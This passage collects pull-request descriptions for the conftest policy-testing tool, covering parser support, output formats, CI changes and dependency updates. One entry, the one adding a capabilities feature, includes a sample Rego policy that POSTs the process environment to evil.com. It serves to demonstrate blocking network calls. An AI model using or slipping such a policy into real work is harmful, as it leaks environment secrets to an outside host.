3. Print the name of the resources as they are tested - without that the output of the tests when not providing a resource name was hard to comprehend, to say the least. Added similar printouts when actually specifying a resource name …

Mac OS support and other fixes

---

internal/commands/test.go
internal/runner/test.go
internal/runner/test_test.go
internal/runner/verify.go
policy/engine.go
policy/loader.go

Fixes #363 
Loading rego files + data files has been refactored into a separate struct. The Test command now also uses the Runner pattern. An Engine class has been created to execute queries against the policies.

Chore: Refactor Test Command.

---

.dependabot/config.yml
.github/dependabot.yml

Currently, we are using v1 dependabot.
The v2 dependabot has GitHub native integrations.
* [Configuration options for dependency updates](https://docs.github.com/en/github/administering-a-repository/configuration-options-for-dependency-updates)

Migrate dependabot to GitHub native version 2

---

contrib/plugins/kubectl-conftest.sh

With v0.21.0 just released, we can now simplify the list processing option (e.g. `kubectl conftest deployments`) and have conftest do that for us, with passed tests as well as failures included in the report.
Signed-off-by: Anders Eknert <anders.eknert@bisnode.com>

Simplify testing list of kubernetes resources

---

policy/engine.go
policy/engine_test.go

Aggregate warnings in the subconfig loop and add a test for warnings.

Include warnings when subconfigs are present

---

internal/commands/pull.go

Define a `policy` flag for the `pull` command rather than the typical StringSlice used in other commands.

Set policy flag as string

---

internal/commands/verify.go

Initially thought there was a bug here with `verify` not respecting any inputs but noticed its intended and that the `input-file` piece after the `--trace` explanation was incorrect.

Remove input-file from verify docs

---

policy/engine.go
policy/loader.go

Because we allow end-users to explicitly specify the paths for both policy and data, it could lead to unexpected errors when attempting to load a given path. 
There could exist other valid documents (like data documents), that would also get loaded and have the potential to error. This does force us to load the policies and documents separately.

Load policies and data documents individually

---

parser/yaml/yaml.go

There really shouldn't need to be a distinction made between Windows/not-Windows when figuring out how to break apart the YAML document. Just which line breaks the document is being used.
Noticed when trying to build the Docker image (alpine) on a Windows machine. Build fails due to linebreaks consisting of CRLF, but the runtime is not windows.

Remove runtime check on YAML parser

---

parser/parser.go

The primary driver behind this was a flaky test (https://github.com/open-policy-agent/conftest/blob/master/parser/format_test.go#L39). But it also makes sense to do, especially when using the `parse` command which renders the results to the console.

Sort combined results by file path

---

acceptance.bats
internal/commands/parse.go
internal/commands/test.go
internal/commands/verify.go
output/json.go
output/json_test.go
output/junit.go
output/junit_test.go
output/output.go
output/output_test.go
output/standard.go
output/standard_test.go
output/table.go
output/table_test.go
output/tap.go
output/tap_test.go

Continuing to work towards more stable and usable package APIs for a `conftest` v1 release, this PR reworks the `output` package.
- Remove `Manager` terminology in favor of types that represent what they output. A package consumer could create an output type by saying `output.JSON`
- Remove the `Flush()` and `Put()` methods on each `Outputter` in favor of a single `Output()`. Everywhere in the codebase we were just ranging over the `CheckResults` collection to Put() them into the output manager and then flushing. This lets us just pass in a collection of results and write them e.g. 
```golang
outputter := output.Get(format)
if err := outputter.Output(results); err != nil {
return fmt.Errorf("output results: %w", err)
}
```
- Replace `log.Logger` with `io.Writer`. This gives us, as well as …

Simplify exposed output package methods

---

.goreleaser.yml

Resolves #399 
This field appears to be required by `dpkg` and .. does not support multiple aliases?

Add maintainers field

---

acceptance.bats
docs/options.md
internal/commands/parse.go
internal/commands/test.go
internal/runner/test.go
parser/parser.go
parser/parser_test.go

This PR aims to change the `--input` flag to instead, be named `--parser`.
**Reasoning:**
The `parser` package exposes a number of different parsers, and these parsers are responsible for parsing different file _formats_. I feel its currently a little confusing to have `conftest test --input tf`, under the hood this just means to use the `hcl2` parser, which we've done a mapping for. Instead, I think it makes more sense to say `conftest test --parser hcl1` or `conftest test --parser hcl2`.
I do think theres value in being able to figure out which Parser to use, based on a file, which `NewFromPath` accomplishes.
This also keeps the language more consistent with what is really happening under the hood, figuring out which _parser_ to use with the given input. As well as keeps the parser …

Change input flag to parser

---

.circleci/config.yml
.dockerignore

Resolves #324 
DockerHub auth has been added for `openpolicyagentopaci` in the Conftest project in CircleCI (thanks @tsandall 🎉  !). This is the user used for pushing the Docker images for other projects in the OPA org (e.g. https://hub.docker.com/r/openpolicyagent/opa/tags)
This enables us to automatically push the Conftest image when a new tag is added to the repository to our repository on DockerHub (https://hub.docker.com/r/openpolicyagent/conftest/tags)
For consistency across the org with the other projects, it would also be a worthwhile to discuss migrating to GitHub Actions.

Push image on release

---

docs/install.md

Given that the instrumenta/conftest docker image will be deprecated next release we should update our documentation to reflect that.
I added a deprecation note as well, but I am open to discussion about the deprecation note.

Update documentation to reflect the deprecation of the instrumenta/conftest docker image.

---

docs/options.md

Fix typo in JUnit output command in documentation

---

docs/plugins.md
plugin/install.go
plugin/plugin.go
plugin/xdg.go
plugin/xdg_test.go

Conftest will now search XDG_DATA_HOME or XDG_DATA_DIRS for the location of the conftest plugins cache. The preference order is as follows:
1. XDG_DATA_HOME if set and .conftest/plugins exists within the XDG_DATA_HOME dir
2. XDG_DATA_DIRS if set and .conftest/plugins exists within one of the XDG_DATA_DIRS
3. ~/.conftest/plugins
First PR for the XDG specification as discussed in #436. This PR makes sure the plugins adhere to the XDG spec. We can follow it up with a PR for the `conftest plugins list` command.

Support XDG specification

---

parser/parser.go
parser/parser_test.go

It is common for Dockerfiles to be named foo.Dockerfile
When detecting the parser for files of this form the logic assumes
it will be lowercase (foo.dockerfile).
Updated this logic to be more permissive, allowing both cases, and
added unit tests to cover these scenarios
Fixes #451
Signed-off-by: shteou <shteou@gmail.com>

Fix case sensitivity in Dockerfile parser detection

---

policy/engine.go
policy/engine_test.go

fix: tracing output with array inputs
Fixed tracing outputs where the inputs are an array of documents
e.g. when the input is a multi-document yaml file, Dockerfile or
.gitignore file
Aggregated Queries for multiple inputs against the filename, in
a similar manner to success/failures etc.
Fixes #454, fixes #456
Signed-off-by: Stewart Platt <shteou@gmail.com>

fix: tracing output with array inputs

---

policy/engine_test.go

Signed-off-by: Stewart Platt <shteou@gmail.com>

chore: remove unneeded Printlns from unit tests

---

docs/options.md
parser/format.go
parser/format_test.go

Fixed an issue where the parse command returns a different result from what is passed internally to the policy engine with the --combine flag. This leads to incorrect expectations when writing policies using combined input. I also updated the documentation to reflect the actual structure of the combined input.

Parse command returns incorrect result with --combined flag.

---

.dockerignore

This reduces the context sent to the docker daemon from 4.151MB to 607.2kB
Longer term this will help docker builds from getting bogged down by a larger context as the git history increases. This shouldn't cause any issues as nothing in the Dockerfile uses git

Ignore .git for docker

---

.circleci/config.yml

Currently the CircleCI docker builds run all the stages as the new
builder isn't enabled.

Enable Buildkit in Docker builds to speed things up

---

.circleci/config.yml
Dockerfile
Makefile

The build process for Docker was missing a mechanism to set the version, commit and date variables.
Fixes: #488

Fix: Version command does not print the version.

---

docs/plugins.md

From the `go-getter` docs, downloading subdirectories requires `//`

Update documentation for installing plugins

---

parser/parser.go
parser/parser_test.go

Add checks for Dockerfiles that are in the format `Dockerfile.somethinghere`
For https://github.com/open-policy-agent/conftest/issues/491

Automatically parse dockerfiles with extensions

---

docs/install.md

I hit an issue on conftest 0.21.0 and found [a resolution](https://github.com/open-policy-agent/conftest/issues/427) which required upgrading. Noticed on Conftest's documentation that the old version was still the "copy+paste" installation method. Quick update.
Additionally, the `$` at the beginning of the first step of install commands make copy+pasting the commands fail. Unless that is intentional, would be nicer to change that to mimic the rest of the commands on that page, so removed those characters.

Minor documentation update to latest Conftest version

---

parser/parser.go
parser/parser_test.go

I can add an `acceptance.bats` test and add a `.tfvars` file to `examples/` if y'all want but it's more HCL2 so I didn't think that was necessary.

Add .tfvars as an HCL2 parseable file type

---

go.mod
go.sum

Relates to:
- https://nvd.nist.gov/vuln/detail/CVE-2021-3121
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3121
Verified with [nancy](https://github.com/sonatype-nexus-community/nancy)

Update gogoproto to v1.3.2

---

internal/commands/verify.go
internal/runner/verify.go
output/json_test.go
output/junit.go
output/junit_test.go
output/output.go
output/result.go
output/result_test.go
output/standard.go
output/standard_test.go
output/table.go
output/table_test.go
output/tap.go
output/tap_test.go

Since version 0.27.0 OPA allows tests to be skipped by prefixing "todo_"
to the test name. This change brings that to the conftest verify command
and allows skipped tests to be reported in all available output formats.
Fixes #479
Signed-off-by: Anders Eknert <anders@eknert.com>

Verify: count and report skipped tests

---

.github/dependabot.yml

Theres a lot of PR noise with dependabot checking everything. The most important dependency is OPA to keep as up to date as possible.

Use dependabot for OPA updates

---

docs/options.md

The docs example policy for the `combine` flag uses underscores
for the index of the input document
The underscore should be avoided here, as it can lead to data
being resolved in multiple input documents where the policy calls
for acting on a single document in a set
Signed-off-by: Stewart Platt <shteou@gmail.com>

feat: improve combined input example

---

docs/index.md

Pointing users to `conftest verify -h` for detailed information. Fixes #524
Signed-off-by: Travis Truman <trumant@gmail.com>

Adding brief documentation on verify in the usage docs

---

docs/sharing.md

Update sharing example when using a PAT

---

internal/runner/test.go
internal/runner/verify.go
policy/engine.go
policy/engine_test.go

Currently conftest always uses tracing even if `--trace` flag is not used. This is causes significant memory consumption when `conftest` is used with a semi complicated rego library and big config files. This is a PR to the https://github.com/open-policy-agent/conftest/issues/555

Do not make rego trace unless --trace flag is passed in 

---

Dockerfile
go.mod
go.sum

Hey 👋 
I just wanted to update the golang version to 1.16 as it was in 1.13. 
Let me know if that version was pinned for any reason.
Thanks!

Bumping go version to 1.16

---

output/tap.go

Noticed when working through another PR that the TAP output did not end in a newline.

Add newline to TAP output

---

acceptance.bats
internal/commands/test.go
internal/runner/test.go
output/output.go
output/standard.go

Adds a `--suppress-exceptions` flag that does not include exceptions in
the output
Example without the flag set (default)
```sh
$ conftest test -p examples/exceptions/policy examples/exceptions/deployments.yaml
FAIL - examples/exceptions/deployments.yaml - main - Containers must not
run as root in Deployment cannot-run-as-root
EXCP - examples/exceptions/deployments.yaml - main - data.main.exception[_][_] == "run_as_root"
2 tests, 0 passed, 0 warnings, 1 failure, 1 exception
```
Example with the flag set
```bash
$ conftest test -p examples/exceptions/policy examples/exceptions/deployments.yaml --suppress-exceptions
FAIL - examples/exceptions/deployments.yaml - main - Containers must not run as root in Deployment cannot-run-as-root
2 tests, 0 passed, 0 warnings, 1 failure, 1 exception
``` …

Add conftest test flag to suppress exceptions

---

internal/commands/plugin_install.go
internal/commands/pull.go
internal/commands/push.go
internal/commands/test.go

This is more helpful to users than stating the required number of arguments was insufficient
---
Fixes #565

Show usage when required parameters are not supplied

---

acceptance.bats
examples/properties/policy/test.rego
examples/properties/sample.properties
go.mod
parser/parser.go
parser/properties/properties.go
parser/properties/properties_test.go

This Change adds support for the *.properties files normally found in
Java projects. It also adds a test-case & a sample properties file with
some rego policies to show how to consume it.
Changes
- Sort the plugin arrays
- Add support for properties files
Signed-off-by: Hamish Hutchings <hamish@drybrough.nl>

Add support for properties files.

---

.github/dependabot.yml
Dockerfile

This should help prevent issues like #580 in the future.

Have Dependabot monitor the Dockerfile

---

acceptance.bats
examples/report/fail/failing_test.rego
examples/report/policy/labels.rego
examples/report/success/success_test.rego
internal/commands/verify.go
internal/runner/verify.go
output/json.go
output/junit.go
output/output.go
output/standard.go
output/table.go
output/tap.go

add --report flag to conftest verify to get a report and summary of the failing tests for better debugging of failing tests.
more about the flag output and difference from --trace is explained (including screenshots) in github issue associated with the PR
Signed-off-by: lanasalameh1 <lanas@zenity.io>

add --report flag to conftest verify

---

docs/options.md
output/github.go
output/github_test.go
output/output.go

GitHub output includes the specialized [workflow commands](https://docs.github.com/en/actions/reference/workflow-commands-for-github-actions) that will automatically be parsed by GitHub during a Pull Request and annotate the policy-violating file.
Example (using **koozz/conftest:v0.26.0-alpha** instead of **openpolicyagent/conftest** to be able to test this unmerged/unreleased code):
```yaml
---
name: Validate
on:
pull_request:
branches: 
- main
paths:
- '**.yml'
- '**.yaml'
jobs:
validate:
name: 'Rego'
runs-on: ubuntu-latest
container: koozz/conftest:v0.26.0-alpha
steps:
- name: Check out the code
uses: actions/checkout@v2
- name: Validate workflows
run: |
conftest test -o github .github/workflows/*.yml -p policy -n workflows
```
policy/workflows.rego:
```rego
package workflows
deny[msg] …
```

Add output format for GitHub.

---

.github/workflows/pr.yaml
.github/workflows/release.yaml
Dockerfile

This ensures that the release is built with the same version of Go that
it was tested with.

build: Specify Go 1.17 in the release workflow

---

.github/workflows/pr.yaml

By default, the GITHUB_TOKEN secret has relatively broad permissions and
could trigger various events such as a release to GitHub which we do not
want to allow in the pull request workflow. By limiting the permissions
of this workflow we can have more confidence that external dependencies in
the workflow cannot cause unintended side effects in the workflow.
https://github.blog/changelog/2021-04-20-github-actions-control-permissions-for-github_token

ci: Limit the permissions of the GITHUB_TOKEN in the PR workflow

---

docs/index.md
policy/engine.go
policy/engine_test.go

This document supplies additional environmental information to the
policies. Currently, it is limited to the name and directory of the file
being evaluated.
---
Implements #65 and #604

engine: Add default `conftest` document during evaluation

---

internal/commands/default.go

Previously when a viper.GetX call was made for a flag with a hypen in
it, if that was set via the environment it would fail because viper's
internal store had it as a value with an underscore instead of a hyphen.
By adding this replacer the conversion happens automatically for
configuration in the environment without affecting the existing flags.
---
See https://github.com/spf13/viper#working-with-environment-variables and https://pkg.go.dev/github.com/spf13/viper#SetEnvKeyReplacer for more info.

 fix: Flags with hyphens were skipped with config from ENV 

---

go.sum

Dependabot introduced [1] an incorrect hash in the go.sum file for the
github.com/google/flatbuffers@v1.12.0 dependency. After working with
Github support, the root cause was determined to be that the default
public Go modules proxy has a different hash than if you connect
directly, likely because at some point the tags were swapped. Dependabot
runs with GOPRIVATE=* set, so it does not use the default proxy and is
why the hash is different.
This change uses the same hash as the public Go modules proxy in order
to ensure the builds work and anyone consuming the Conftest repository
are able to build. The flatbuffers maintainers introduced a 1.12.1 which
is the same code as the 1.12.0 release to fix [2] this issue going forward,
which we will use once the dependency that introduced the …

fix: Incorrect hash in go.sum

---

acceptance.bats
examples/report/policy_print/labels.rego
internal/runner/verify.go
output/result.go
output/standard.go
policy/engine.go

This depends on OPA 0.34.0: #627

engine+reporter: enable `print()` output

---

parser/parser.go
parser/parser_test.go

As stated in the following url,
https://terragrunt.gruntwork.io/docs/getting-started/configuration/
There are two known default filenames which terragrunt will look for
when running; terragrunt.hcl and terragrunt.hcl.json.
The latter of these files is presently handled by conftest. The former,
is incorrectly detected due to the hcl file extension. Terragrunt uses
HCL2 as of v0.19 when it moved to the terragrunt.hcl file format (and
away from the terraform.tfvars which it used to use).
[upgrading-to-terragrunt-0.19](https://github.com/gruntwork-io/terragrunt/blob/master/docs/_docs/06_migration_guides/upgrading_to_terragrunt_0.19.x.md)
This patch adds specific detection of the known terragrunt configuration
files and sets their type to HCL2
Signed-off-by: Tim Rupp <caphrim007@gmail.com>

Support for terragrunt default config files

---

parser/parser.go

When passing a large list of files (>30) that need to be parsed using `ParseConfigurations` and if there was an error in one of them such as not a valid yaml file then it's hard to find which file is causing it. turns out I need to create a script for validating it. so then this PR will include the information of the file path that i think it's an useful information.
sample of returned error with this PR.
```
unmarshal yaml: error converting YAML to JSON: yaml: line 6: mapping values are not allowed in this context, path: /tmp/debug-lego/validations/lego/canary/manifest/web/ingress.yml
```

Add file path information in returned error message

---

policy/engine.go

The document mentions as below.
>Note that if you specify the empty string, the exception will match all rules named deny or violation. It is recommended to use identifiers in your rule names to allow for targeted exceptions.
https://www.conftest.dev/exceptions/
But it looks like an empty string from `exception` is not supported now if I'm not wrong. Please let me know if I should add a new test (and example).

fix(exception): support empty string

---

internal/commands/verify.go
internal/runner/verify.go

When running in a batch mode, successful runs can clutter the output
this allows us to run in a quiet mode where we only output failures
Signed-off-by: Soren Mathiasen <smo@tradeshift.com>

feat: add quiet flag to verify

---

internal/commands/pull.go
internal/commands/push.go
internal/runner/test.go

Resolves https://github.com/open-policy-agent/conftest/issues/597
Some history can be found in the linked issues/PRs in the issue itself, but this effectively makes things consistent such that we always use the `orascontext` when talking to an OCI registry.
There is now a `v1.0.0` of `oras-go` which makes this a little better, but their docs don't seem to be up to date. For example, `oras.Push` has been removed from `v1.0.0` but their docs still say to use `oras.Push` -- so this felt like the simplest approach to resolve the issue until we integrate ORAS `v1` into Conftest.

Always use ORAS context when interacting with registry

---

go.mod
go.sum

For [CVE-2021-43816](https://nvd.nist.gov/vuln/detail/CVE-2021-43816) which was reported by dependabot.

Update containerd to v1.5.9

---

.github/workflows/pr.yaml
.github/workflows/release.yaml

Dependabot bumped the version in the Dockerfile, but did not update the
GitHub Actions workflows.

Bump Go to 1.17.6 in pull_request and release workflows

---

SECURITY.md

This updates links to open-policy-agent/opa/SECURITY.md to point to the main tree since that is the new default branch in that repo. It is not strictly necessary since GH is redirecting the old links appropriately.

docs: Update link to point to new default branch

---

Makefile
internal/commands/default.go

This can be useful when troubleshooting Rego policy errors for language
features that were recently introduced.
--- 
Fixes #671

Add OPA version to --version output

---

docs/install.md

The installation commands snippet did not work since wget output was redirected to /dev/null and not being passed to the next pipes for extracting latest version number.

Update install.md - Fix install command

---

internal/commands/test.go
internal/commands/verify.go
output/junit.go
output/junit_test.go
output/output.go
output/output_test.go

To better integrate with CI systems such as Jenkis, the JUnit output now
includes the test namespace in the package name using dot notation. This
enables the tests under a namespace to be grouped where previously all
tests were under a single "conftest" group.
A `--junit-hide-message` flag was introduced to optionally suppress the
test summary message from the test name. This can be useful for tracking
trends over time since all violations for a file in a given namespace
will have a consistent test name.
---
Fixes #695

Refactor JUnit output formatting

---

acceptance.bats
internal/commands/parse.go
parser/format.go

This allows for interoperability with other tooling that expects JSON
input.
---
Fixes #684. This is a **breaking change** for any tooling that relied on the previous formatting from the `parse` command.

Only emit valid JSON when using the parse command

---

.github/workflows/pr.yaml
.github/workflows/release.yaml

Bump Go version in GHA workflows to 1.18.1

---

acceptance.bats
examples/capabilities/capabilities.json
examples/capabilities/malicious.rego
internal/commands/push.go
internal/commands/test.go
internal/commands/verify.go
policy/engine.go
policy/engine_test.go
runner/test.go
runner/verify.go

Fix: https://github.com/open-policy-agent/conftest/issues/690
**Example Executions:**
Assume that you have examples/policy2/malicious.rego:
```rego
package main
deny {
request := {
"url": "https://evil.com:9999",
"method": "POST",
"body": opa.runtime().env,
}
response := http.send(request)
}
```
_by default behavior:_
```shell
./conftest test examples/kubernetes/deployment.yaml -p examples/kubernetes/policy2/
1 test, 1 passed, 0 warnings, 0 failures, 0 exceptions
```
_with a capabilities file that has everything defined inside:_
```shell
./conftest test examples/kubernetes/deployment.yaml -p examples/kubernetes/policy2/ --capabilities v0.17.0.json
1 test, 1 passed, 0 warnings, 0 failures, 0 exceptions
```
_having capabilities file which excludes sending HTTP requests:_
```shell
./conftest …
```

feat: add capabilities feature to conftest

---

acceptance.bats
builtins/parse_config.go
builtins/parse_config_test.go
docs/index.md
examples/hcl2/policy/deny_test.rego
examples/hcl2/policy/unencrypted_azure_disk.tf
examples/hcl2/terraform.tf
internal/commands/default.go

This builtin can be used to parse configuration snippets in-line in Rego policies,
making it easier to write unit tests in the same configuration language that will
be tested.
---
Implements a solution for #621.

Add parse_config and parse_config_file builtins

---

docs/index.md

This allows us to link to the anchor that takes the user directly to the constants.

Use pkg.go.dev for constants reference

---

.github/workflows/pr.yaml
.github/workflows/release.yaml
Dockerfile

Dependabot tried to migrate to v1.19.0 but we do not use the first release of a new feature version.

Bump Go to v1.18.5

---

.github/workflows/release.yaml

https://github.blog/changelog/2022-10-11-github-actions-deprecating-save-state-and-set-output-commands/

workflow: update set-output usage

---

downloader/oci_detector.go
downloader/oci_detector_test.go

Quay.io recently added support for Conftest OCI media types (see[1]), so for a bit nicer UX add quay.io to the list of OCI detectors.
[1] https://github.com/quay/quay/pull/1567
Signed-off-by: Zoran Regvart <zoran@regvart.com>

Detect Quay.io OCI registry in downloader

---

internal/commands/push.go
scripts/push-pull-e2e.sh

Adds the `data` flag to the `conftest push` command. Allows for adding data to the bundle that's located in a separate directory. 
Threw this together, let me know if this is worth merging.

Adding data flag to conftest push

---

internal/commands/push.go
policy/engine.go
scripts/push-pull-e2e.sh

This commit allows the command `conftest push` to create a bundle that contains data but no policies.
Signed-off-by: Luiz Carvalho <lucarval@redhat.com>

Allow data-only bundles

---

acceptance.bats
builtins/parse_config.go
examples/kubernetes/combine/combine.rego
examples/kubernetes/combine/combine.yaml
examples/kubernetes/combine/combine_test.rego
examples/kubernetes/combine/deployment.yaml
examples/kubernetes/combine/service.yaml

This is similar to the existing parse_config and parse_config_file methods, but it'll work on combined config files instead.
With this, we can do something like this when unit testing rego files
```
test_parse_combined_config_files {
count(violation) == 1 with input as parse_combined_config_files(["deployment.yaml", "service.yaml"])
}
```
Signed-off-by: Darren Dao <Darren_Dao@intuit.com>

Added helper method to load combined config files for Rego unit tests

---

.github/workflows/pr.yaml
CONTRIBUTING.md
scripts/validate-conventional-commit-prefix.sh

This helps reviewers and automation quickly categorize the change.

Require commits to have conventional commit prefix

---

docs/options.md

Update docs to use the latest Github action

docs: Bump actions/checkout to v3

---

acceptance.bats
examples/strict-rules/policy/lenient.rego
internal/commands/push.go
internal/commands/test.go
internal/commands/verify.go
policy/engine.go
policy/engine_test.go
runner/test.go
runner/verify.go

Fix: https://github.com/open-policy-agent/conftest/issues/776
This does small tweaks:
- bump-up `opa` to the latest for recent strict features (like unused function args etc)
- add `--strict` as a flag for `verify` and `test`
- handing over the compiler related configs to `compileroptions`

feat: add strict compilation rules to policies being evaluated

---

downloader/oci_getter.go

Without this change, registry.ParseReference throws an error if the URL contains a scheme, e.g. https://.

Remove scheme from OCI URL before parsing it

---

output/standard.go

Fix: #558
Correlates: #785 and #769
Seems like no-policies-found was added as of https://github.com/open-policy-agent/conftest/blob/v0.22.0/output/standard.go
because it doesn't exist in https://github.com/open-policy-agent/conftest/blob/v0.21.0/output/standard.go
I'm not sure for what reason it was added here or due to which requirement but seems it's not considered for some of the users. Also in my tests, I didn't see any action on `totalPolicies` other than just printing info so discarded this
Thanks for the review in advance

fix: no policies found

---

.github/workflows/release.yaml
Makefile

The 'docker build' command does not support more than one platform at a time.

fix: Use docker buildx for multi-platform builds

---

docs/index.md

I tried to add some clarity around `not deny` and how to structure testable rules with `deny_{name}`. I saw an example [here](https://github.com/open-policy-agent/conftest/issues/783#issue-1596926238), but I think the implications of it for testing weren't obvious.
I think this helps clear up these issues.
https://github.com/open-policy-agent/conftest/issues/781
https://github.com/open-policy-agent/conftest/issues/783
In my opinion there should be a built-in for `no_violations` (or something similar) that can auto-detect that there are no `deny_*` rules, but that's a problem for another day

docs: fix verify docs/example code and mention deny_ prefix

---

downloader/oci_detector.go
downloader/oci_detector_test.go

When detecting OCI go-getter strings, the detector can look at any port number and any loopback interface address and consider it to be a local OCI registry.

fix: detect regardless of port and loopback

---

acceptance.bats
examples/builtin-errors/invalid-dns.rego
policy/engine.go

fix: handle builtin errors returned from the rego evaluation

---

policy/engine.go

this is to fix the linter issue reported in the dependabot PR: https://github.com/open-policy-agent/conftest/actions/runs/5425401141/jobs/9866098968?pr=838
Also, it pretty prints the whole array structure, perhaps better than using `%s`
e.g
```shell
./conftest test -p examples/builtin-errors/invalid-dns.rego examples/kubernetes/deployment.yaml
Error: running test: query rule: check: query rule: built-in error: [{Code:eval_builtin_error Message:net.lookup_ip_addr: lookup not-real-domain.xyz: no such host Location:examples/builtin-errors/invalid-dns.rego:4}]
```

fix: pretty print the built-in err structure

---

acceptance.bats
examples/compose/docker-compose-valid.yml
examples/compose/policy/deny.rego

The conversion to a number of the version string evaluated to a boolean. Subsequently the boolean was compared to a number, which always resulted in a failure to comply to that rule.
This PR fixes the conversion error so that the comparison now works as expected. This PR also adds some tests to prevent regression.

fix: examples/compose - a deny rule was incorrectly implemented

---

.github/workflows/release.yaml
.goreleaser.yml

Fixes two issues. The first is blocking the new Conftest release [1].
- https://goreleaser.com/deprecations/#archivesreplacements
- https://goreleaser.com/deprecations/#-rm-dist
[1] https://github.com/open-policy-agent/conftest/actions/runs/5496566137/jobs/10016665656
---
The output file name patterns are consistent with the previous patterns:
```
$ goreleaser release --auto-snapshot --skip-docker --skip-publish --clean
<successful>
$ ls -lh dist | grep -v -E "^d"
total 335008
-rw-r--r--  1 james  staff   9.5K Jul  8 17:23 artifacts.json
-rw-r--r--  1 james  staff   1.5K Jul  8 17:23 checksums.txt
-rw-r--r--  1 james  staff   4.5K Jul  8 17:21 config.yaml
-rw-r--r--  1 james  staff    13M Jul  8 17:23 conftest_0.44.0-SNAPSHOT-a6c6055_Darwin_arm64.tar.gz
-rw-r--r--  1 james  staff    14M …
```

ci: Migrate off of deprecated GoReleaser options

---

.github/workflows/release.yaml

It is important to check the GoReleaser config before pushing to Dockerhub to avoid having mismatches between what is in Dockerhub and GitHub releases.

ci: Check GoReleaser config before performing any release actions

---

docs/options.md

docs: Fix typo in options docs

---

internal/commands/test.go

Since the shorthand name is empty, there's no need to use BoolP, so let's use Bool instead.

fix: Use Bool instead of BoolP for three flags

---

docs/options.md
output/azuredevops.go
output/azuredevops_test.go
output/output.go

Azure DevOps output can be set with the `-o azuredevops` flag
- docs have been updated
- tests have been added, and all are passing
- output follows formatting standards outlined in Azure DevOps' [Logging commands > Formatting commands](https://learn.microsoft.com/en-us/azure/devops/pipelines/scripts/logging-commands?view=azure-devops&tabs=bash#formatting-commands) documentation
To address #852 
```console
$ conftest test -o azuredevops -p examples/kubernetes/policy examples/kubernetes/deployment.yaml
##[section]Testing 'examples/kubernetes/deployment.yaml' against 5 policies in namespace 'main'
##[group]See conftest results
##vso[task.logissue type=error] file=examples/kubernetes/deployment.yaml --> Containers must not run as root in Deployment hello-kubernetes
##vso[task.logissue …
```

feat: added support for Azure DevOps output

---

.golangci.yaml
go.mod
go.sum
parser/yaml/yaml.go
plugin/plugin.go

This is a fork that is maintained by the kubernetes community.
https://github.com/kubernetes-sigs/yaml

chore: Replace ghodss/yaml with sigs.k8s.io/yaml

---

acceptance.bats
internal/commands/verify.go

Without this `conftest verify --strict` does not fail in situations where running `conftest test --strict` would.
I think this was probably an oversight with #798 and it was expected that `conftest verify --strict` should behave the same as `conftest test --strict`.
Without this change the behaviour is:
```
$ go run . verify --policy examples/strict-rules/policy --strict
0 tests, 0 passed, 0 warnings, 0 failures, 0 exceptions, 0 skipped
```
With this change the behaviour is:
```
$ go run . verify --policy examples/strict-rules/policy --strict
Error: running verification: load: loading policies: get compiler: 4 errors occurred:
examples/strict-rules/policy/lenient.rego:6: rego_compile_error: assigned var b unused
examples/strict-rules/policy/lenient.rego:7: rego_compile_error: assigned var …
```

fix: `--strict` flag when using `conftest verify`

---

acceptance.bats
internal/commands/test.go
policy/engine.go
runner/test.go

Fix: #840, #870 
This is to bring the user experience closer to opa when it comes to built-in errors. 
By default, OPA doesn't fail on built-in errors unless `--show-builtin-errors ` is explicitly passed, but conftest does. 
This PR introduces the same flag in conftest along with the same functionality as well

fix: cover built-in errors with a flag, suppress unless it's passed

---

go.mod
go.sum
parser/spdx/spdx.go

Updating the SPDX parser to the latest version and adjusting to the changed interface. This allows other components to use the latest version of the SPDX parser when pulling in conftest code.

chore: Update github.com/spdx/tools-golang to current version

---

.github/workflows/pr.yaml
.regal/config.yaml
acceptance.bats
examples/awssam/policy/policy.rego
examples/combine/policy/duplicate.rego
examples/cyclonedx/policy/policy.rego
examples/docker/policy/commands.rego
examples/docker/policy/images.rego
examples/hcl1/policy/base.rego
examples/hcl2/policy/deny.rego
examples/hcl2/policy/deny_test.rego
examples/ignore/dockerignore/policy/deny.rego
examples/ignore/gitignore/policy/deny.rego
examples/kubernetes/combine/combine.rego
examples/kubernetes/policy/base_test.rego
examples/kubernetes/policy/deny.rego
examples/kubernetes/policy/labels.rego
examples/kubernetes/policy/violation.rego
examples/kubernetes/policy/warn.rego
examples/properties/policy/test.rego
examples/report/policy/labels.rego
examples/report/policy_print/labels.rego
examples/serverless/policy/base.rego
examples/serverless/policy/util.rego
examples/spdx/policy/policy.rego
examples/traefik/policy/base.rego
examples/traefik/policy/base_test.rego
examples/xml/policy/deny.rego

This PR introduces [Regal](https://github.com/styrainc/regal) for linting the example policies in this project. The Rego found there is generally in a good shape, and the fixes done as part of this are mostly related to style.
The code has been updated to conformance against the following rules:
* [line-length](https://docs.styra.com/regal/rules/style/line-length)
* [use-assignment-operator](https://docs.styra.com/regal/rules/style/use-assignment-operator)
* [use-some-for-output-vars](https://docs.styra.com/regal/rules/idiomatic/use-some-for-output-vars)
* [prefer-snake-case](https://docs.styra.com/regal/rules/style/prefer-snake-case)
* [print-or-trace-call](https://docs.styra.com/regal/rules/testing/print-or-trace-call)
A few rules are also ignored for now (`.regal/config.yaml`) and I'll …

Use Regal for Rego linting

---

output/output.go

Currently, `output.Get()` always defaults to creating a new `Outputter` object that writes to `os.Stdout`; however, it's possible that a different output channel is desired.
This PR adds an option to allow a different `File` object as output when calling `Get()`.
Resolves #879.

Implement option for custom output destinations in `output.Get()`

---

builtins/parse_config.go

Parsed Dockerfiles are an array at the root, not a map.
Fixes #865.

fix: Unmarshal error for Dockerfile in parse_config builtins

---

.github/workflows/pr.yaml
.github/workflows/release.yaml

v2 uses old versions of Node which are deprecated.

ci: Bump setup-go and checkout to v4

---

.goreleaser.yml

Goreleaser includes the short SHA1 commit before the commit message, so the previous patterns matching only on the beginning of the line were not matching when they should have.

fix: Fix regexp for Goreleaser groups

---

docs/index.md
internal/commands/verify.go
runner/verify.go
tests/builtin-errors/policy/main.rego
tests/builtin-errors/policy/main_test.rego
tests/builtin-errors/test.bats

This is useful to raise config parsing errors when using the parse_config builtins. Previously, the unit test would fail but it was unclear to the user whether that was due to an error in the policy logic or a typo in the config.

feat: Add show-builtin-errors flag for the verify command

---

.goreleaser.yml

s390x architecture is added in the goarch list. This will enable conftest to be used on an IBM Z based VM.

feat: s390x architecture added in the goarch list

---

.gitignore
internal/testing/memfs/memfs.go
policy/engine.go
policy/engine_test.go
tests/problematic-if/policy/invalid.rego
tests/problematic-if/policy/valid.rego
tests/problematic-if/test.bats

